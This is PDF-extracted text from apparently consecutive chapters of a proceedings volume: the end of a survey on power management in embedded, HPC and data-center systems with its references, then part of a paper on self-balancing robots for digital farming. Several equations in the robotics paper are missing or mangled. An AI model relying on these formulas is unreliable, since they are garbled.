respectively. However, one limitation of the study was that it considered only the
nodes with homogenous energy consumption.
An optimization strategy that uses both voltage scaling and chip parallelism
was proposed by Ozturk et al. [21] for voltage island-based embedded design. The
approach makes use of compiler which uses heterogeneity in parallel execution where
different voltages and frequencies to different processors were applied to reduce the
consumption of energy without increasing the overall execution cycles. Experiments
were carried out with the help of different applications, and the results revealed that
the optimization technique is capable of yielding energy benefits at a large scale.
228 M. Ahmed and W. Ahmed
Embedded systems have size and cost constraints. The battery size is very small
and the surface area of embedded system is less, which results in less amount of
heat dissipation. Therefore, embedded systems require proper cooling systems. In
some of the embedded applications such as video and audio playback and gaming,
the ratio of processor’s runtime to idle time is very high. In such devices, dynamic
power management techniques can help to reduce the power consumption at runtime.
Pedram [22] reviewed the tools and techniques adopted for power management
in embedded systems. They considered the hardware platform, the application soft-
ware, and the system software for their analysis. The concepts and techniques were
illustrated with the help of design examples from an Intel Strong ARM-based sys-
tem. The study was not intended to be a comprehensive review, yet it served as a
base for a comprehensive understanding of power-aware design methodologies and
techniques for embedded systems.
Brock and Rajamani [23] designed a generic power management system to man-
age energy and power efficiently in embedded systems. According to the design,
power management strategy can be varied based on the application. DPM strategy
refers to the policies for power optimization designed by the system designer. How-
ever, activation of these policies/strategies is controlled by the policy manager.
Agarwal et al. [24] used on-demand paging scheme for increasing the energy effi-
ciency of wireless network embedded systems. The study implemented on-demand
paging scheme on an infrastructure-based WLAN which consisted of iPAQ PDAs
equipped with Bluetooth radios and Cisco Aironet wireless networking cards. The
findings of the study exhibited power savings that range from 23% to 48% over
802.11b standard operating modes with trivial impact on performance. One major
drawback of the design is that it was prototyped in the low-power BT radios, and
the performance of the scheme on high-power large sensor-based networks remains
uncertain.
Raghunathan and Chou [25]studied the various issues and trade-offs involved in
designing and implementing energy-saving techniques in embedded systems. System
design techniques which involve extracting energy from the environment and making
it available for consumption by the system were explained by their study. The study
described various power management techniques which considered the different
spatiotemporal characteristics of energy availability and energy usage within a system
and across network. As a conclusive remark, the study suggested that the entire system
from the design of architecture to the power management must be optimized in a
holistic way at the application and networking levels to operate harvesting systems
accurately.
Choi [26] used DC-DC converters as a source for solving the problem of mini-
mizing energy in embedded systems. The study analyzed the impacts of the variation
in the efficiency of DC_ DC converters while executing a single task and also by
implementing DVS scheme. The study puts forward the DC DVS technique for
dc_ dc converter to minimize its energy consumption. The characteristics of DC_
State-of-the-Art Power Management Techniques 229
DC converters were embedded into the DVS techniques to perform multiple tasks.
Finally, the study proposed a technique named DC CONF for generating a DC_ DC
converter and presented an integrated framework to address the DC_ DC converter
configuration and DVS simultaneously. The results of the experiment indicated that
Dc-Ip saved up to 24.8% of energy when compared to other existing power manage-
ment schemes, which do not take the efficiency variation of DC_ DC converters into
account.
Park et al. [27]presented a compiler-based method for the preservation of the
leakage power during the code execution, which mainly arises due to the insertion
of power gating instructions into a code to activate/deactivate (i.e., ON/OFF) the
functional units in a microprocessor. The study proposed a polynomial time optimal
algorithm called PG-instr to minimize the total power leakage by considering the
power and delay overhead on power gating. The study also found out that the algo-
rithms were adaptable to other power gated resources such as diverse memory units
and multicores as well.
Wang and Chen [33] developed a new control algorithm called multi-input-multi-
output (MIMO) for multiple servers working in harmony. Within every control cycle,
the controller compiles the power consumption and CPU application for each server,
then calculates a new CPU frequency for each processor and addresses each processor
to alter its frequency in an integrated way.
Liu and Zhu [2] detailed the thermal management technique used in commercial
clusters which involves throttling or reducing the amount of dissipated heat. This
reduction is important as high temperatures make the systems unreliable and costly.
Skadron et al. [34] developed a proportional–integral–differential (PID) controller
to regulate the heat produced. It followed three steps: 1. proportional action, where
power was regulated to decrease the amount of errors, 2. integral action, where power
was adjusted corresponding to the time integral of errors occurred in the past and
maintained at a zero-error state, and finally 3. derivative action, where any overshoot
is circumvented by damping the response and providing stability to the controller.
Taffoni et al. [35] have evaluated the impact of computation on consumption of
energy of two applications from astrophysical domain. The evaluation is done on three
different systems, an Intel-based cluster, a prototype of an Exascale supercomputer,
and a microcluster based on ARM MPSoC which have the least energy consumption
but at the cost of slowing down the performance.
Data centers host a wide range of Internet facilities such as Web hosting, e-commerce
services, banking, retail commerce, and cloud computing. These wide range of func-
tions require very high power which in turn requires advanced cooling configurations.
Hence, it is understood that energy consumption in large-scale data centers imposes
electricity costs which makes power and energy consumption the two main concerns
in data centers. Expensive uninterrupted power supplies and backup power gener-
ators were needed in cases of peak power requirements [36]. Power management
techniques that were adopted for battery-held devices cannot be used in the context
of servers because server workloads and operating environments are different from
battery-operated devices.
Chen et al. [37] proposed the first dedicated framework to reduce the energy
consumption in servers at hosting centers that run multiple applications to meet
performance-based service-level agreements (SLAs). The study used steady-state
queuing analysis, feedback control theory, and a hybrid mechanism that is based
on both steady-state queuing and feedback control theory. The study results proved
that the solutions provided by the framework were found to be more adaptive to the
workload behavior while performing server provisioning and speed control when
implemented with the help of real Web server traces.
The power consumption behavior of large-scale servers that execute different
classes of applications was studied by Fan et al. [30]. The study found that there
exists a distinct gap (about 40%) between the observed and theoretical power usage
State-of-the-Art Power Management Techniques 231
values in data centers even while executing well-tuned applications. The study used a
modeling framework to estimate the power-saving efficiency of power management
schemes. The findings revealed that power and energy savings were found to be
greater at the cluster level (thousands of servers) than at the rack level (tens of servers).
The study pointed out the necessity of the systems to remain power efficient not only
across the activity range, but also during its peak performance.
Raghavendra et al. [38] presented a coordinated multilevel power management for
data centers. The study proposed a power management technique that combined dif-
ferent individual power management approaches. The simulation results were based
on 180 server traces from nine different real-world enterprises which demonstrated
the correctness, stability, and efficiency advantages of the solution proposed by the
study. Furthermore, the study with its unified model performed a detailed quantitative
sensitivity analysis regarding the impact of different architectures, implementation
styles, sizes of workload, and system design choices on power management.
Narayanan et al. [39] proposed a technique called “write off-loading” to conserve
energy in enterprise storage. The write requests on spun-down disks were temporar-
ily redirected to a persistent storage elsewhere in an enterprise data center. This in
turn alters the I/O access pattern that generates significant idle periods during which
the volume’s disks can be spun down. This saves the energy consumed. The study
analyzed potential savings using real-world traces collected from thirteen servers in
the data center. The findings showed that significant energy savings were achieved by
spinning down the idle disks. Also, as write off-loading creates longer idle periods, it
helps in saving large amounts of energy. The study validated the analysis by imple-
menting the write off-loading on a hardware testbed and measured its performance.
The evaluation confirms the analysis by showing 28–36% reduction in the energy
consumption by just spinning down the disks and 45–60% reduction by using write
off-loading.
Govindan et al. [40] designed a technique based on controlled provisioning, statis-
tical multiplexing, and over-booking for provisioning the power infrastructure in data
centers. The evaluation of a prototype data center proved the feasibility and benefits
of the technique. The study results show that the adopted technique achieved double
the CPW offered by the Power Distribution Unit executing TPC-W, an e-commerce
benchmark, by accurately identifying the peak power needs of hosted workloads.
A 10% overbooking in the PDU-based conclusions of power profiles yielded 20%
additional improvement in PDU throughput with minimal loss in performance.
Leverich et al. [41] used Per Core Power Gating (PCPG) for additional power
management in multicore processors. The study was conducted on a commercial 4-
core chip with the help of real-world application traces from enterprise environments.
PCPG was found to reduce 40% of the energy consumed by the processor without any
significant performance overheads. Furthermore, when compared with DVFS, PCPG
was found to be more effective in saving 30% more energy. The study suggested
to implement DVFS and PCPG together, which can save up to 60% of the power
consumed.
Liu et al. [42] addressed the challenges faced by elastic power management in
Internet data centers. They analyzed the resource provisioning and utilization patterns
232 M. Ahmed and W. Ahmed
in data centers and proposed a macroresource management layer that can coordinate
the various cyber and physical resources. They also reviewed some of the existing
solutions for resource management along with its limitations. The study pointed out
the importance of a coordination layer to aid in resource utilization after carefully
monitoring the cyber-activities and physical dynamics in data centers. The study
asserted it as a challenging goal that requires breakthroughs in many areas of research
such as data management, resource and software abstraction, sensing, modeling,
control, and system design. According to the study, the service requests that hit
the data centers must be coordinated with the physical resources to provide both
operational and energy efficiency.
Urgaonkar et al. [43] explored the power management and optimal resource allo-
cation in virtual data centers with heterogeneous applications and have time-varying
workloads. The study used the system queuing information in order to make online
control decisions. Furthermore, the study used a specific technique known as Lya-
punov optimization to design an online admission control, routing, and resource
allocation algorithm for a virtual data center. The findings revealed that the algo-
rithm maximizes a joint utility of the average application throughput and manages
the power and energy costs of the data center.
Beloglazov and Buyya [44] proposed a resource management policy for dealing
with power-performance trade-offs in the case of cloud data centers. The findings of
the study justified the statement that dynamic reallocation of virtual machines and
turning off the idle nodes to reduce power consumption to yield the promised QoS
will save a substantial amount of energy.
Lin et al. [45] examined the amount of power saved by dynamic “right-sizing”
the data center. The servers were turned off during the idle periods, and an online
algorithm was used to check the amount of power savings achieved. According to the
study, the simple structure of an optimal offline algorithm for dynamic right-sizing
has been exploited to design a new lazy online algorithm which is three times more
competitive. The study validated the algorithm using traces from two real data center
workloads and showed that if PMR of a data center is greater than 3, then the cost
of toggling a server will be less than a few hours of server costs, and less than 40%
background load.
7 Conclusion
In this paper, we have reviewed various studies related to power management tech-
niques in embedded systems, HPC systems, HPC clusters, data centers, and virtual
environment.
The studies related to the static power management bring out some of the major
shortcomings which include lapse in the energy concerns related to multimedia appli-
cations, since the study focused mainly on data management tasks [6]. Valentini et al.,
[11] pointed out the limitations related to the popular architecture, FAWN and also
highlighted the concern regarding the feasibility of FAWN architecture. He pointed
State-of-the-Art Power Management Techniques 233
out that FAWN architecture can neither be parallelized nor its working set size can
be further divided to be assigned into the available memory of the smaller nodes.
Some of the major limitation which the study came across as a result of the in
depth review of power management in embedded systems include compatibility of
the design models with high power devices [24] and the optimization of the entire
system from design architecture to power management for the proper operation of
these systems [25]. Studies related to the power management techniques for HPC
systems showed a series of constrains and shortcomings which include, long request
time delay [46], energy saving/time delay [47], Cooling cost, temperature threshold
[48], utilization threshold [49], failure rate, temperature constraints, power budget
[50] and performance [33, 51, 52].
The review of studies pertaining to dynamic power management revealed some of
its limitations such as application of the models limited only to homogenous systems
[20]. The energy savings were found to be dependent on application, workload sys-
tem, and DVS strategy. Furthermore, most of the techniques used were implemented
manually which should be replaced by modern automated ones [12].
The studies which describe the power management techniques adopted by various
functional areas revealed some major snags that need to be addressed and rectified.
Reviews of the studies about power management in the data centers brought out a
serious limitation regarding the practical applicability of the frameworks as many of
them are just theoretical works and are not successfully implemented in any of the
platform [37, 44].
The gaps mentioned above paves the way to design a optimized power manage-
ment technique for HPC.
References
1. Shehabi, A., Smith, S., Sartor, D., Brown, R., Herrlin, M., Koomey, J., Masanet, E., Horner,
N., Azevedo, I., & Lintner, W. (2016). United states data center energy usage report.
2. Liu, Y., & Zhu, H. (2010). A survey of the research on power management techniques for
high-performance systems. Software: Practice and Experience, 40(11), 943–964.
3. Feng, W.-C. (2003). Making a case for efficient supercomputing. Queue, 1(7), 54.
4. Ge, R., Feng, X., Song, S., Chang, H.-C., Li, D., & Cameron, K. W. (2010). Powerpack: Energy
profiling and analysis of high-performance systems and applications. IEEE Transactions on
Parallel and Distributed Systems, 21(5), 658–671.
5. Pinheiro, E., Bianchini, R., & Dubnicki, C. (2006). Exploiting redundancy to conserve energy
in storage systems. ACM SIGMETRICS Performance Evaluation Review, 34(1), 15–26.
6. Rivoire, S., Shah, M. A., Ranganathan, P., & Kozyrakis, C. (2007) Joulesort: A balanced energy-
efficiency benchmark,” in Proceedings of the 2007 ACM SIGMOD international conference
on Management of data. ACM (pp. 365–376).
7. Caulfield, A. M., Grupp, L. M., & Swanson, S. (2009). Gordon: using flash memory to build fast,
power-efficient clusters for data-intensive applications. ACM Sigplan Notices, 44(3), 217–228.
8. Andersen, D. G., Franklin, J., Kaminsky, M., Phanishayee, A., Tan, L., & Vasudevan, V. (2009).
Fawn: A fast array of wimpy nodes. In: Proceedings of the ACM SIGOPS 22nd symposium on
Operating Systems Principles. ACM (pp. 1–14).
234 M. Ahmed and W. Ahmed
9. Hamilton, J. (2009). Cooperative expendable micro-slice servers (cems): low cost, low power
servers for internet-scale services. In Conference on Innovative Data Systems Research
(CIDR’09)(January 2009).
10. Vasudevan, V., Andersen, D., Kaminsky, M., Tan, L., Franklin, J., & Moraru, I. (2010). Energy-
efficient cluster computing with fawn: Workloads and implications. In Proceedings of the 1st
International Conference on Energy-Efficient Computing and Networking. ACM (pp. 195–
204).
11. Valentini, G. L., Lassonde, W., Khan, S. U., Min-Allah, N., Madani, S. A., Li, J., et al. (2013).
An overview of energy efficiency techniques in cluster computing systems. Cluster Computing,
1–13.
12. Ge, R., Feng, X., & Cameron, K. W. (2005). Improvement of power-performance efficiency
for high-end computing. In 19th IEEE International Proceedings on Parallel and Distributed
Processing Symposium, 2005. IEEE (pp. 8–pp).
13. Hotta, Y., Sato, M., Kimura, H., Matsuoka, S., Boku, T., & Takahashi, D. (2006). Profile-
based optimization of power performance by using dynamic voltage scaling on a pc cluster. In
Parallel and Distributed Processing Symposium, 2006. IPDPS 2006. 20th International. IEEE
(pp. 8–pp).
14. Rajamani, K., Hanson, H., Rubio, J., Ghiasi, S., & Rawson, F. (2006). Application-aware
power management. In 2006 IEEE International Symposium on Workload Characterization.
IEEE (pp. 39–48).
15. Freeh, V. W., Kappiah, N., Lowenthal, D. K., & Bletsch, T. K. (2008). Just-in-time dynamic
voltage scaling: Exploiting inter-node slack to save energy in mpi programs. Journal of Parallel
and Distributed Computing, 68(9), 1175–1185.
16. Khargharia, B., Hariri, S., & Yousif, M. S. (2008). Autonomic power and performance man-
agement for computing systems. Cluster computing, 11(2), 167–181.
17. Von Laszewski, G., Wang, L., Younge, A. J., & He, X. (2009) Power-aware scheduling of virtual
machines in dvfs-enabled clusters. In IEEE International Conference on Cluster Computing
and Workshops, 2009. CLUSTER’09. IEEE (pp. 1–10).
18. Huang, S., & Feng, W. (2009) Energy-efficient cluster computing via accurate workload char-
acterization. In Proceedings of the 2009 9th IEEE/ACM International Symposium on Cluster
Computing and the Grid. IEEE Computer Society (pp. 68–75).
19. Le Sueur, E., & Heiser, G. (2010) Dynamic voltage and frequency scaling: The laws of dimin-
ishing returns.
20. Alvarruiz, F., de Alfonso, C., Caballer, M., & Hern’ndez, V. (2012). An energy manager for
high performance computer clusters. In 2012 IEEE 10th International Symposium on Parallel
and Distributed Processing with Applications (ISPA). IEEE (pp. 231–238).
21. Ozturk, O., Kandemir, M., & Chen, G. (2013). Compiler-directed energy reduction using
dynamic voltage scaling and voltage islands for embedded systems. IEEE Transactions on
Computers, 62(2), 268–278.
22. Pedram, M. (2001). Power optimization and management in embedded systems. In Proceedings
of the 2001 Asia and South Pacific Design Automation Conference. ACM (pp. 239–244).
23. Brock, B., & Rajamani, K. (2003). Dynamic power management for embedded systems [soc
design]. In SOC Conference, 2003. Proceedings. IEEE International [Systems-on-Chip]. IEEE
(pp. 416–419).
24. Agarwal, Y., Schurgers, C., & Gupta, R. (2005). Dynamic power management using on demand
paging for networked embedded systems. In Proceedings of the 2005 Asia and South Pacific
Design Automation Conference. ACM (pp. 755–759).
25. Raghunathan, V., & Chou, P. H. (2006). Design and power management of energy harvest-
ing embedded systems. In Proceedings of the 2006 international symposium on Low power
electronics and design. ACM (pp. 369–374).
26. Choi, Y., Chang, N., & Kim, T. (2007). Dc-dc converter-aware power management for low-
power embedded systems. IEEE Transactions on Computer-Aided Design of Integrated Circuits
and Systems, 26(8), 1367–1381.
State-of-the-Art Power Management Techniques 235
27. Park, D., Lee, J., Kim, N. S., & Kim, T. (2010). Optimal algorithm for profile-based power
gating: A compiler technique for reducing leakage on execution units in microprocessors.
In Proceedings of the International Conference on Computer-Aided Design. IEEE Press (pp.
361–364).
28. Pinheiro, E., Bianchini, R., Carrera, E. V., & Heath, T. (2001). Load balancing and unbalancing
for power and performance in cluster-based systems. In Workshop on compilers and operating
systems for low power, Vol. 180. Barcelona, Spain (pp. 182–195).
29. Chase, J. S., Anderson, D. C., Thakar, P. N., Vahdat, A. M., & Doyle, R. P. (2001). Managing
energy and server resources in hosting centers. ACM SIGOPS operating systems review, 35(5),
103–116.
30. Fan, X., Weber, W.-D., & Barroso, L. A. (2007). Power provisioning for a warehouse-sized
computer. ACM SIGARCH Computer Architecture News, 35(2), 13–23.
31. Ranganathan, P., Leech, P., Irwin, D., & Chase, J. (2006). Ensemble-level power management
for dense blade servers. ACM SIGARCH Computer Architecture News, 34(2), 66–77.
32. Femal, M. E., & Freeh, V. W. (2005). Boosting data center performance through non-uniform
power allocation. In Proceedings of 2nd International Conference on Autonomic Computing,
2005. ICAC 2005. IEEE (pp. 250–261).
33. Wang, X., & Chen, M. (2008). Cluster-level feedback power control for performance optimiza-
tion. In IEEE 14th International Symposium on High Performance Computer Architecture,
2008. HPCA 2008. IEEE (pp. 101–110).
34. Skadron, K., Abdelzaher, T., & Stan, M. R. (2002). Control-theoretic techniques and thermal-
rc modeling for accurate and localized dynamic thermal management. In High-Performance
Computer Architecture, 2002. Proceedings. Eighth International Symposium on. IEEE (pp.
17–28).
35. Taffoni, G., Tornatore, L., Goz, D., Ragagnin, A., Bertocco, S., Coretti, I., Marazakis, M.,
Chaix, F., Plumidis, M., Katevenis, M., Panchieri, R., & Perna, G. (2019). Towards exascale:
Measuring the energy footprint of astrophysics hpc simulations. In 2019 15th International
Conference on eScience (eScience) (pp. 403–412).
36. Bianchini, R., & Rajamony, R. (2004). Power and energy management for server systems.
Computer, 37(11), 68–76.
37. Chen, Y., Das, A., Qin, W., Sivasubramaniam, A., Wang, Q., & Gautam, N. (2005). Manag-
ing server energy and operational costs in hosting centers. ACM SIGMETRICS Performance
Evaluation Review, 33(1), 303–314.
38. Raghavendra, R., Ranganathan, P., Talwar, V., Wang, Z., & Zhu, X. (2008). No power struggles:
Coordinated multi-level power management for the data center. ACM SIGARCH Computer
Architecture News, 36(1), 48–59.
39. Narayanan, D., Donnelly, A., & Rowstron, A. (2008). Write off-loading: Practical power man-
agement for enterprise storage. ACM Transactions on Storage (TOS), 4(3), 10.
40. Govindan, S., Choi, J., Urgaonkar, B., Sivasubramaniam, A., & Baldini, A. (2009). Statistical
profiling-based techniques for effective power provisioning in data centers. In Proceedings of
the 4th ACM European conference on Computer systems. ACM (pp. 317–330).
41. Leverich, J., Monchiero, M., Talwar, V., Ranganathan, P., & Kozyrakis, C. (2009). Power man-
agement of datacenter workloads using per-core power gating. IEEE Computer Architecture
Letters, 8(2), 48–51.
42. Liu, J., Zhao, F., Liu, X., & He, W. (2009). Challenges towards elastic power management in
internet data centers. In Distributed Computing Systems Workshops, 2009. ICDCS Workshops’
09. 29th IEEE International Conference on. IEEE (pp. 65–72).
43. Urgaonkar, R., Kozat, U. C., Igarashi, K., & Neely, M. J. (2010). Dynamic resource allocation
and power management in virtualized data centers. In Network Operations and Management
Symposium (NOMS), 2010 IEEE. IEEE (pp. 479–486).
44. Beloglazov, A., & Buyya, R. (2010). Energy efficient resource management in virtualized cloud
data centers. In Proceedings of the 2010 10th IEEE/ACM International Conference on Cluster,
Cloud and Grid Computing. IEEE Computer Society (pp. 826–831).
236 M. Ahmed and W. Ahmed
45. Lin, M., Wierman, A., Andrew, L. L., & Thereska, E. (2013). Dynamic right-sizing for power-
proportional data centers. IEEE/ACM Transactions on Networking (TON), 21(5), 1378–1391.
46. Colarelli, D., & Grunwald, D. (2002). Massive arrays of idle disks for storage archives,” in Pro-
ceedings of the 2002 ACM/IEEE Conference on Supercomputing (pp. 1–11). IEEE Computer
Society Press.
47. Freeh, V. W., & Lowenthal, D. K. (2005). Using multiple energy gears in mpi programs on a
power-scalable cluster. In Proceedings of the tenth ACM SIGPLAN Symposium on Principles
and Practice of Parallel Programming, (pp. 164–173).
48. Moore, J. D., Chase, J. S., Ranganathan, P., & Sharma, R. K. (2005). Making scheduling
“ol” emperature-aware workload placement in data centers. In USENIX Annual Technical
Conference, General Track (pp. 61–75).
49. Heath, T., Centeno, A. P., George, P., Ramos, L., Jaluria, Y., & Bianchini, R. (2006). Mercury and
freon: Temperature emulation and management for server systems. ACM SIGARCH Computer
Architecture News, 34(5), 106–116.
50. Stoess, J., Lang, C., & Bellosa, F. (2007). Energy management for hypervisor-based virtual
machines. In USENIX annual technical conference, (pp. 1–14).
51. Verma, A., Ahuja, P., & Neogi, A. (2008). Pmapper: Power and migration cost aware application
placement in virtualized systems. In Proceedings of the 9th ACM/IFIP/USENIX International
Conference on Middleware. Springer, (pp. 243–264).
52. Leng, J., Hetherington, T., ElTantawy, A., Gilani, S., Kim, N. S., Aamodt, T. M., et al. (2013).
Gpuwattch: Enabling energy optimizations in gpgpus. ACM SIGARCH Computer Architecture
News, 41(3), 487–498.
Application of Robotics in Digital
Farming
Abstract Cultivation is the most labour-intensive field, as most of the work is done
manually by the farmer, which reduces productivity and quality. The cropping fields
are vast and require constant monitoring and care, which is difficult if done manually.
The paper aims at presenting a detailed study of the application of the self-balancing
robot in the field of digital farming and its advantages over the traditional methods.
The study will outline the use of a dynamic system like the inverted cart pendulum for
robot modelling. Further, it discusses the need for filtering techniques in the device
and introducing the theory behind the control system and controllers like the linear
quadratic regulator.
1 Introduction
Agriculture evolved through different stages starting from primitive agriculture stage
in which the farmers used to practice traditional methods such as slash and burn
farming methods and shifting cultivation to grow crops and fodder for their self-
sufficiency for their family and cattle needs. Then came the stage of traditional
agriculture which accepted and gave financial and economic value to the profession of
farming. Usage of synthetic fertilizers and pesticides along with electrically powered
machines came into existence and provided agriculture with a business outlook and
big markets. Digital farming which involves the utilization of IoT based devices and
robotics can be used in various fields like:
1. Database maintenance-The digitization in farming provides information about
climatic changes, farm areas in use, financial and economic conditions of the
market, etc. This digital data storage on the database provides easy and swift
access to information to our farmers.
2. Realtime data collection-IoT and digitization together can achieve this task as
the various sensors can be employed to monitor the farmlands, soil, the vegetation
of the field, humidity, and moisture content of the soil. All this data collected is
updated in the database.
3. Geographical information system (GIS)-GIS is one of the most powerful tech-
nological tools that can study the geography of an area and form intelligent deci-
sions. The GIS model is employed with CPS, i.e. the central processing system.
The CPS is responsible for storing the data, storing the results generated by the
GPS model, and implementing them by instructing the digitized machinery.
4. Digitized agriculture machinery (DAM)-Through the analysis made by GIS and
GPS model together with the digitized agriculture machinery such as digitized
fertilizer control device, sowing device, irrigation control device, etc. perform
their operation on-field and store the real-time data over the database accordingly.
Before the onset of digitization in the field of agriculture, most of the tasks were
performed manually by the farmer, but today with advancement in technology, we
are provided with ample resources to reduce manual labour, thus reducing the highly
tiring and difficult fieldwork. Internet of things [1] is a branch of technology that
provides us with devices that can collect the data through sensors and can develop
a network layer for data processing and transmission. A self-balancing robot has
a complex structure and design along with the dynamic motion, as a result of this
the construction and development of the robot is a tedious task, but the following
advantages of the device outweigh the development cost:
1. The Manoeuvrability-The ability of the device to move freely defines its manoeu-
vrability. Self-balancing robots are highly proficient in terms of manoeuvrability
due to the reduction in its turn radius. A four or three-wheeled robot will cover
a greater radius at turns due to structural limitations, but a two-wheeled self-
balancing robot reduces this turn radius value to zero, thus covering the minimum
area.
2. Stability-A two-wheeled self-balancing robot can balance itself in any given
terrain, which makes them suitable for travelling and transporting loads from one
place to another across uneven fields and land.
The advantages of a self-balancing robot make it a device suitable in the field of
digital agriculture, as agricultural plots and lands are uneven surfaces, that hinder the
movement of normal three or four-wheeled devices but with efficient manoeuvrability
and minimum turn radius, a self-balancing robot can easily traverse the fields for
monitoring purposes. In addition to this, a two-wheeled robot has reduced wheels
and a sleek and narrow-body structure, which makes it compact, thus increases
the locomotive capabilities across a crop field without damaging the crops. A two-
wheeler robot when loaded with the required sensors, will reduce manual labour by
technically monitoring the farmlands and providing real-time data through wireless
communication.
This paper presents an in-depth analysis of the application of such robots in digital
farming, as explained in Sect. 1. The main aim is the system modelling through
Application of Robotics in Digital Farming 239
the inverted cart pendulum system that can be seen in Sect. 3 of the paper. Further,
Sect. 4 explains the concept of control systems, followed by the introduction to linear
quadratic regulator. Finally, Sect. 5 explains the implementation of filters for sensor
data through mathematical equations.
2 Literature Review
The two-wheeler robot emerged in the year 1986 under the guidance of Kazua Yama-
fuji who was a professor at Tokyo’s University of Electro-Communications. He
invented a robot similar to the inverted pendulum system which can effectively tra-
verse the ground with two wheels. Since then, this type of robot system has been
widely used in almost all fields, especially agriculture. There are multiple techniques
to construct this device either by using different control system and controller method
or by varying the type of filter. The paper [2] utilises augmented PID to stabilise
the robot based on the inverted cart pendulum. Similarly, the paper [3] shows the
implementation of the linear quadratic regulator technique for balancing. Also, using
unique sensors provide new features to robot improving its functionality, as seen in
paper [4] that shows the implementation of ultrasonic sensors to avoid obstacles.
Further, the motion sensors require filters which remove redundant signals or noise
from the data. The paper [5] employs a complementary filter for two-wheeler robot
and presents the disadvantages of Kalman filter for this purpose.
An inverted pendulum system is highly unstable and non-linear. This nature is the
virtue of its centre of mass being above the pivot point. This dynamic system mod-
elling is used in two-wheeled robots due to similarity in the structure and non-
linearity.
In Fig. 1, the point around which the pendulum is showing motion is the pivot
point. Due to gravity g, the pendulum has moved to a certain angle from the vertical
axis. So, the equation of torque generated by the system can be:
So, by using this equation an Euler-Lagrange rule we derive the following equa-
tions: g
ϕ̈g = sin ϕ (2)
l
ẍ
ϕ̈x = cos ϕ (3)
l
240 D. Agarwal et al.
g ẍ
ϕ̈ = ϕ̈g + ϕ̈x = sin ϕ − cos ϕ (4)
l l
Using Laplace [6] method in the above equation will generate the transfer function
of the system.
Fig. 2 Diagrammatic
representation open-loop
configuration [7]
Application of Robotics in Digital Farming 241
n
J= (xkT Qxk + u kT Ru k ) (5)
K =0
For the system, the LQR method finds out the gain matrix to stabilise the feedback
from the system:
u (t) = −K x˙ (6)
The technology around us tends to generate data in the forms of image, audio, video,
speech, etc. All this data is accepted, received, and transmitted in the form of a
signal or waves to be precise. The signals generated from the data are readable by
devices and machines to process them further. Thus, the field of analysis, production,
and modifications of the signals is known as signal processing. The field of signal
processing helps in the functioning of sensors. It can efficiently reduce noise in the
242 D. Agarwal et al.
signal, analyse and read data encoded in the signal, convert it from one form to
another, and much more. Generally, these signals are classified in various categories
such as analog, digital, discrete-time, etc. An important process in this field is filtering
of signals [9] as the name suggests filtering is performed to obtain the required
frequency of the wave or the signal passed through it. This is done to reduce or
attenuate the effects of noise which gets added to the signal, while passing through
several components of the device and the device used in this process is a filter.
There is no simple hierarchical classification of filters, they may be non-linear or
linear, time-variant or time-invariant, causal or not-causal, analog or digital, passive
or active, etc. A self-balancing robot requires a frequency filter circuit to improve
the signal or data obtained from the sensor employed to measure the tilt angle [10].
This type of filter tends to suppress a specific value of frequency not required in the
signal processing and is leading to noise.
These filters that discriminate signal based on the range of frequency can be
classified as low pass and high pass filters, that will be used further for processing
sensor data.
A low pass filter [9, 11] efficiently rejects all the frequencies ranges lying above
the cut-off frequency thus accepting only low-frequency ranges. From Fig. 4, we can
infer that the amplitude at frequencies w1 and w2 are equal, but once passed through
the filter there is a significant change as w2 reduces tremendously indicating that the
frequencies higher than wc were attenuated and w1 was allowed to pass through the
filter.
A high pass filter [9, 11] efficiently rejects all the frequency ranges lying below
the cut-off frequency thus accepting only high-frequency ranges. From Fig. 5, we can
infer that the amplitude at frequencies w1 and w2 are equal, but once passed through
the filter there is a significant change as w1 reduces tremendously indicating that the
frequencies lower than wc were attenuated and w2 was allowed to pass through the
filter. A high-pass filter and a low-pass filter together form a complementary filter
which provides the functionality and features of both the filters.
In Fig. 6 given above, the signals x and y are the measurements of noise [12] in
a collective signal z which contains both x and y. Ẑ is the measurement of output
produced by the filter. Now let us assume that the y noise measurement represents
signals of high frequency and, x, on the other hand, represents a noise signal of
low frequency. So, to reduce these noises accordingly, y is made to pass through
a low-pass filter G(s) that accepts a low range of frequency, thus attenuating the
high-frequency noise signal. Further, the x noise signal is made to pass through a
complement of G(s) i.e., 1 − G(s), also known as a high pass filter to attenuate low-
frequency noise signals. Thus, a complementary filter intelligently reduces noise
depending upon the frequency of signals. Now, the robot is employed with GY-87
device, for studying the tilt and motion of the complete system. This device reads
gyroscope data and accelerometer data for all the 3 axes. Now the set of 12 values
obtained are combined with the help of these filters to give final result in terms of
tilt angle. The readings are obtained as follows (Fig. 7).
As the name suggests accelerometer is a device used to measure the rate of change
of velocity of a system in its instantaneous domain. The accelerometer has its disad-
vantage in terms of its response time to the changing tilt angle which is fairly slow on
the other hand the gyroscope uses angular velocity to calculate the shift in the incli-
nation of the robot. But in gyroscope, the value changes rapidly over time. So, these
244 D. Agarwal et al.
filters show opposite behaviour to each other as accelerometer fails to work accord-
ingly in the presence of gravity and gyroscopes show faulty readings, while moving
in plains. Complementary filter sorts and filters the data from both the devices in a
way that the noise is reduced to minimal value and we get the accurate readings. Now
the filter is implemented in the Arduino code in the form of the equation. When the
robot shows any change in its orientation the GY-87 sensor produces values through
accelerometer and gyroscope. Now this data must be processed to attenuate noise
and this is done by the following equations: The equation for high pass filter:
Here, s(n) is the value from the gyroscope and S(n) is the actual angle that will be
used in the next cycle of the program. The above equation will determine your values
for the gyroscope.
The equation for low pass filter:
Here, s(n) is the value from the accelerometer and S(n) is the actual angle that will
be used in the next cycle of the program. The above equation will determine your
values for the accelerometer. Now, we will combine pitch values from these filters
together in the form of the complementary filter so as generate real-time tilt value
of the robot. Although accelerometer alone could have generated the pitch value
addition of gyroscope makes the robot movable in all kinds of high and low surfaces
and even on-ramps. Hence, the pitch angle is:
Here, arr [1] is the value of accelerometer for y-axis and arr [2] is the value of
accelerometer for z-axis. Combining this with the gyroscope values for x-axis and
the final equation of the complementary is as follows:
Application of Robotics in Digital Farming 245
6 Conclusion
The research paper worked through the history of agriculture and explained the
evolution of farming techniques that lead to digitisation [13]. Application of IoT
based devices in this field is explained thoroughly along with the detailed study on
the benefits and advantages of the Two-Wheeler robot in cultivation. Further, we saw
the system modelling through inverted pendulum system where the torque’s equation
was used in the Euler-Lagrange rule to find the resultant rotational acceleration. The
paper practically implemented the complementary filter by working through the
concept of high-pass and low filter. The mathematical equations for the two were
determined and combined to find out the tilt angle. The GY-87 sensor data used to
calculate the tilt angle had minimal noise due to these filters. Finally, the controller
